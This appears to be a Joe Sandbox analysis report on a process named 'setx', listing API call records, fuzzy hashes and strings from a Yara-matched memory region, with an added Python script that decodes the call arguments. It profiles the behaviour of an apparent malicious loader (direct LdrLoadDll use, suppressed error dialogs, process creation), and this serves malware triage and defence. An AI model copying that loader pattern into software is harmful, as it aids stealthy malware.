                        • API ID: MessagePostThread
                        • String ID: y11J94u5t$y11J94u5t
                        • API String ID: 1836367815-1857237950
                        • Opcode ID: d4014a7f82bfd4c4b5c392abbe8c2f3a4fc6c55da09482422e0725ea95ef265c
                        • Instruction ID: 9ed2b4add9a45a1eba015fdc0b287ce53bbb55a5e7db586371dd28e40e0e2088
                        • Opcode Fuzzy Hash: d4014a7f82bfd4c4b5c392abbe8c2f3a4fc6c55da09482422e0725ea95ef265c
                        • Instruction Fuzzy Hash: FB01C831E4025876DB21AB919C02FDF7B7C9F41B54F444155BA047B181D6786A0687A9
                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00432D1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: 2c13c63140d7957b4d8ddc56fb1a01df24c052451a126f09caa042e6a1dbdffe
                        • Instruction ID: 99cc13df33f5078a76f838168dc8d5567c3813b33b60740d2a7e3c71c454b4b6
                        • Opcode Fuzzy Hash: 2c13c63140d7957b4d8ddc56fb1a01df24c052451a126f09caa042e6a1dbdffe
                        • Instruction Fuzzy Hash: 8C315EB1600704ABD714DF65CC85FEBBBB8EB88744F00452EBA5D6B245D7B4BA40CBA4
                        APIs
                        • RtlAllocateHeap.NTDLL(00421766,?,004347DB,00421766,00434777,004347DB,?,00421766,00434777,00001000,?,?,00439C70), ref: 004383FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: wGC
                        • API String ID: 1279760036-4262620719
                        • Opcode ID: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction ID: e45af0968d65abe8aec60e57a5831f06a0dbda634c5366731d07a4fb5c1783ca
                        • Opcode Fuzzy Hash: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction Fuzzy Hash: 2CE06D752042047BD614EF59DC46EDB33ACEFC8714F00440AFA0DA7241C670B9118AB8
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,?,00421A50,00436E97,00434777,?), ref: 00427C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID: wGC
                        • API String ID: 2340568224-4262620719
                        • Opcode ID: ef2920d3e055be692ddf31b3d0548f79ffaaf97fef2632f230840df87f9cd97b
                        • Instruction ID: b9bd16ac24cb8c9696ab1bd1d64e3051f412cc88261073f3907e8fb74bd2c810
                        • Opcode Fuzzy Hash: ef2920d3e055be692ddf31b3d0548f79ffaaf97fef2632f230840df87f9cd97b
                        • Instruction Fuzzy Hash: E6E0C2777803003BF750D7B1AC07FB522499B85704F054169B90CD63C2E929F9114229
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,?,00421A50,00436E97,00434777,?), ref: 00427C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID: wGC
                        • API String ID: 2340568224-4262620719
                        • Opcode ID: f8400cc9d30aae11928ba3888ba0d918eb23a6dac0955d6349a825a5319c61b9
                        • Instruction ID: 9ff1cc80dbdcbb72fd49f45139a80ad86c79ddca6b9d4c871c710e9572224bfc
                        • Opcode Fuzzy Hash: f8400cc9d30aae11928ba3888ba0d918eb23a6dac0955d6349a825a5319c61b9
                        • Instruction Fuzzy Hash: 9FD05E723843143BF750A7B69C07FA6328D5B85754F054169BA0CDB2D2E969F5104169
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0042ECE7
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Initialize
                        • String ID: @J7<
                        • API String ID: 2538663250-2016760708
                        • Opcode ID: 64a2b2c3d2c4c534bb0262d5df59a5ba862a538046fb26de5ef13569335b554e
                        • Instruction ID: 2bdaa5236865eb5c85aade15a8ba2932f41780ea417bb69742524821eb70cd3d
                        • Opcode Fuzzy Hash: 64a2b2c3d2c4c534bb0262d5df59a5ba862a538046fb26de5ef13569335b554e
                        • Instruction Fuzzy Hash: FC314DB6A1060A9FDB00DF99D8809EEB7B9FF88304B508559E505EB314D775AE05CBA0
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0042ECE7
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Initialize
                        • String ID: @J7<
                        • API String ID: 2538663250-2016760708
                        • Opcode ID: 47e57b663ea4e8bb39407ab17e335c96b2a1127cc8e2f58856ff3b19e4127920
                        • Instruction ID: b26b351d470da5d2c5076ff6c46059474131bb3646951bdb6cdd4e157645f807
                        • Opcode Fuzzy Hash: 47e57b663ea4e8bb39407ab17e335c96b2a1127cc8e2f58856ff3b19e4127920
                        • Instruction Fuzzy Hash: 7D314DB6A0020AAFDB00DFD9D8809EFB3B9BF88304F508559E505EB314D775EE058BA0
                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00424582
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 7990f290981bd4aee8d21bcb8d2ae64449c1592f8a81b01ec6cffc28f3e0e825
                        • Instruction ID: e1340d28d1bbc7754868cfafadb9fb21c83a3e60dd436a568c94302debb9d9ad
                        • Opcode Fuzzy Hash: 7990f290981bd4aee8d21bcb8d2ae64449c1592f8a81b01ec6cffc28f3e0e825
                        • Instruction Fuzzy Hash: E50152B6E0020DB7DF10EBE5EC42F9EB3789B54308F404195EA0897241F634EB54C795
                        APIs
                        • CreateProcessInternalW.KERNELBASE(00421001,00421029,00420E01,00000000,00427E03,00000010,00421029,?,?,00000044,00421029,00000010,00427E03,00000000,00420E01,00421029), ref: 00438500
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 3fd48a30e9d0ae253e7c946412751fffa894b6aa8f0fbddb53dac173fcdc2c6c
                        • Instruction ID: 74224eb5312f9741f4de3d05988ae55f5c81e913999d3c83aca26cbb06a54bb7
                        • Opcode Fuzzy Hash: 3fd48a30e9d0ae253e7c946412751fffa894b6aa8f0fbddb53dac173fcdc2c6c
                        • Instruction Fuzzy Hash: AD01AEB2200208BBCB44DE89DC81EDB77ADAF8C754F018209FA0DA3240D634E8518BA8
                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419705
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 5577063b7115bd8f84cde0c5b87baa86d32718c9197f9556726589215144810d
                        • Instruction ID: 207246b0426be83f5a6e23374b4c75b6ff68a2d3cf00f657142290af2ffcc986
                        • Opcode Fuzzy Hash: 5577063b7115bd8f84cde0c5b87baa86d32718c9197f9556726589215144810d
                        • Instruction Fuzzy Hash: E3F0657338031436E23066AAAC03FDB734CCF85BA5F14042AFB0CDB1C1D996B85142E8
                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419705
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 612f07cfd547da86b30dd011403053c1142aa68976199a2cf9b2a585cb37d91c
                        • Instruction ID: 753fd56b8bf6388affa64fbbedb9ad97a05a035e301b5c4db61fa55093f30dc8
                        • Opcode Fuzzy Hash: 612f07cfd547da86b30dd011403053c1142aa68976199a2cf9b2a585cb37d91c
                        • Instruction Fuzzy Hash: E3F0ED323C130077F23066A99C07FDB224C8F80B54F24045AFB08EB2C1CAAAB85082A8
                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,05C0C1F8,00000007,00000000,00000004,00000000,00423DFB,000000F4,?,?,?,?,?), ref: 0043844C
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 5b5779b60b6029d5b904e4ea3c71d230503f93d838177fd9535817038665164d
                        • Instruction ID: c15ed651c29da25cd1e8f3ba5cfad3859d2a93141d96d060f49787cabbf174b0
                        • Opcode Fuzzy Hash: 5b5779b60b6029d5b904e4ea3c71d230503f93d838177fd9535817038665164d
                        • Instruction Fuzzy Hash: 91E039B1204204BBD614EE69DC41E9B33ACEB88710F004009BA1CA7241D670B9118AB8
                        APIs
                        • GetFileAttributesW.KERNELBASE(?), ref: 00427E6C
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 24d4ac1920455be403cab738455affea6146d3d0e88abb47b82f3acc6191bfef
                        • Instruction ID: 6a5997341efa5db3059560b9c6a9f0c1a8c2c74fd3617fcde2d578dfd48d86de
                        • Opcode Fuzzy Hash: 24d4ac1920455be403cab738455affea6146d3d0e88abb47b82f3acc6191bfef
                        • Instruction Fuzzy Hash: CFE0DF7124420427FB206BA8AC46B6633488B48764F6906E1B91C8F2D1E53CFD014164
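                        The API records above for the code mapped at 0x00410000 (PostThreadMessageW, Sleep, RtlAllocateHeap, SetErrorMode, CoInitialize, LdrLoadDll, CreateProcessInternalW, CreateThread, RtlFreeHeap, GetFileAttributesW) are easier to triage once the argument columns are decoded. The Python below is an added example written for this page; it is not part of Joe Sandbox or of its report. It parses records in the `Api.MODULE(args), ref: addr` form used here (the sample input is a constructed copy of the entries listed above) and decodes the arguments whose meaning is fixed by the Win32 API: the SetErrorMode flag word, the Sleep interval, the PostThreadMessageW message number, and which calls go straight to NTDLL exports rather than through a kernel32 wrapper. The flag and message names are standard Windows constants; the `describe` heuristics and the function names are my own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Union

# Constructed input: the API records shown in this section for the code at
# 0x00410000, one per line, in the "Api.MODULE(args), ref: addr" form.
SAMPLE_RECORDS = """\
PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00420BCD
Sleep.KERNELBASE(000007D0), ref: 00432D1B
RtlAllocateHeap.NTDLL(00421766,?,004347DB,00421766,00434777,004347DB,?,00421766,00434777,00001000,?,?,00439C70), ref: 004383FC
SetErrorMode.KERNELBASE(00008003,?,?,00421A50,00436E97,00434777,?), ref: 00427C83
CoInitialize.OLE32(00000000), ref: 0042ECE7
LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00424582
CreateProcessInternalW.KERNELBASE(00421001,00421029,00420E01,00000000,00427E03,00000010,00421029,?,?,00000044,00421029,00000010,00427E03,00000000,00420E01,00421029), ref: 00438500
CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419705
RtlFreeHeap.NTDLL(00000000,00000004,00000000,05C0C1F8,00000007,00000000,00000004,00000000,00423DFB,000000F4,?,?,?,?,?), ref: 0043844C
GetFileAttributesW.KERNELBASE(?), ref: 00427E6C
"""

Arg = Union[int, str, None]  # hex value, inline string, or "?" (unresolved)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int  # address of the call instruction

RECORD_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 constants (winbase.h / winuser.h).
SEM_FLAGS = {
    0x0001: "SEM_FAILCRITICALERRORS",
    0x0002: "SEM_NOGPFAULTERRORBOX",
    0x0004: "SEM_NOALIGNMENTFAULTEXCEPT",
    0x8000: "SEM_NOOPENFILEERRORBOX",
}
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT", 0x0111: "WM_COMMAND"}

def parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None            # the disassembler could not resolve the value
    try:
        return int(token, 16)  # "00008003" -> 0x8003, "-00000002" -> -2
    except ValueError:
        return token           # inline string operand, e.g. a window title

def parse_records(text: str) -> List[ApiCall]:
    """Turn report lines into ApiCall objects; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls

def decode_error_mode(value: int) -> List[str]:
    """Expand a SetErrorMode flag word into named bits, flagging unknown ones."""
    names = [name for bit, name in SEM_FLAGS.items() if value & bit]
    leftover = value & ~sum(SEM_FLAGS)
    if leftover:
        names.append(f"unknown(0x{leftover:x})")
    return names

def describe(call: ApiCall) -> str:
    """Heuristic one-line reading of a call (assumption: my own triage rules)."""
    a = call.args
    if call.api == "SetErrorMode" and a and isinstance(a[0], int):
        return "error dialogs suppressed: " + "|".join(decode_error_mode(a[0]))
    if call.api == "Sleep" and a and isinstance(a[0], int):
        return f"sleeps {a[0]} ms"
    if call.api == "PostThreadMessageW" and len(a) > 1 and isinstance(a[1], int):
        return f"posts {WINDOW_MESSAGES.get(a[1], hex(a[1]))} to a thread"
    if call.module == "NTDLL":
        return "native API called directly, not through the kernel32 wrapper"
    return "no decoder"

def summarize(text: str) -> Dict[str, str]:
    """Map each API name in the records to its decoded description."""
    return {c.api: describe(c) for c in parse_records(text)}

if __name__ == "__main__":
    for api, note in summarize(SAMPLE_RECORDS).items():
        print(f"{api:24s} {note}")
```

Running it reads the SetErrorMode argument 0x8003 as SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX, i.e. the process asked Windows not to show crash or missing-file dialogs, the Sleep argument 0x7D0 as 2000 ms, and the PostThreadMessageW message 0x111 as WM_COMMAND. The `-00000002` start address recorded for CreateThread is left as-is: it is a static-analysis placeholder, not a real pointer, and should not be interpreted further.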
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 13541670bdba0b99c91a98430422c92adffdcd6aae1160e03830f8267c49e71d
                        • Instruction ID: f6a357694fd4514e2d21edbb10ecebd22eed281d4ec35c22d93b9706c0bf8524
                        • Opcode Fuzzy Hash: 13541670bdba0b99c91a98430422c92adffdcd6aae1160e03830f8267c49e71d
                        • Instruction Fuzzy Hash: 00B09BB19419D5C5EA11E7604A0C717794067D0701F15C161D6030641F4739D1D5E176
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 575650a2d501c17a948c8e9434c5317809272c0de04d5eabed58d15fd72b0dca
                        • Instruction ID: 6a827f4664e86df58c642004d06cf34c1bdeeb3d026642848e51fd7fa49d56e5
                        • Opcode Fuzzy Hash: 575650a2d501c17a948c8e9434c5317809272c0de04d5eabed58d15fd72b0dca
                        • Instruction Fuzzy Hash: 8AB0922AA9400801D1256C2F79803B0F368C7C7235E102AAFE90CF7A000093C89E0999
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: 98fd5d9f4b9ec10d31f594e10dc64d97aa9c948e05812deddc272b3a52a1caa5
                        • Instruction ID: a4fa3fb3b882b272f6d78016d97bdeafb6cb5d2831021fa2aba565796f3b4a0e
                        • Opcode Fuzzy Hash: 98fd5d9f4b9ec10d31f594e10dc64d97aa9c948e05812deddc272b3a52a1caa5
                        • Instruction Fuzzy Hash: 6951E6B2A04166BFDB20DB9989C097EF7F8BB48204754816AEC65D7641D334DF80CBE5
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: 7e17c25a42cb3b7d75bf54fede4b6bcb17eab2b525d3f4aecbede2dc1662daa9
                        • Instruction ID: 1785f0fe4d583a5c71e944ea9721d62f1715b5ae15635a2440a7337ca6eda706
                        • Opcode Fuzzy Hash: 7e17c25a42cb3b7d75bf54fede4b6bcb17eab2b525d3f4aecbede2dc1662daa9
                        • Instruction Fuzzy Hash: FC51D575A00645AFDB30DF5CC89097FB7F9EF84200B6484AEE896D7681E774EA40CB61
                        Strings
                        • ExecuteOptions, xrefs: 02C846A0
                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02C84655
                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02C84725
                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 02C84787
                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02C846FC
                        • Execute=1, xrefs: 02C84713
                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02C84742
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                        • API String ID: 0-484625025
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-$0$0
                        • API String ID: 1302938615-699404926
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$[$]:%u
                        • API String ID: 48624451-2819853543
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02C802E7
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02C802BD
                        • RTL: Re-Waiting, xrefs: 02C8031E
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                        • API String ID: 0-2474120054
                        Strings
                        • RTL: Resource at %p, xrefs: 02C87B8E
                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02C87B7F
                        • RTL: Re-Waiting, xrefs: 02C87BAC
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                        • API String ID: 0-871070163
                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C8728C
                        Strings
                        • RTL: Resource at %p, xrefs: 02C872A3
                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02C87294
                        • RTL: Re-Waiting, xrefs: 02C872C1
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                        • API String ID: 885266447-605551621
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$]:%u
                        • API String ID: 48624451-3050659472
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-
                        • API String ID: 1302938615-2137968064
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID: $$@
                        • API String ID: 0-1194432280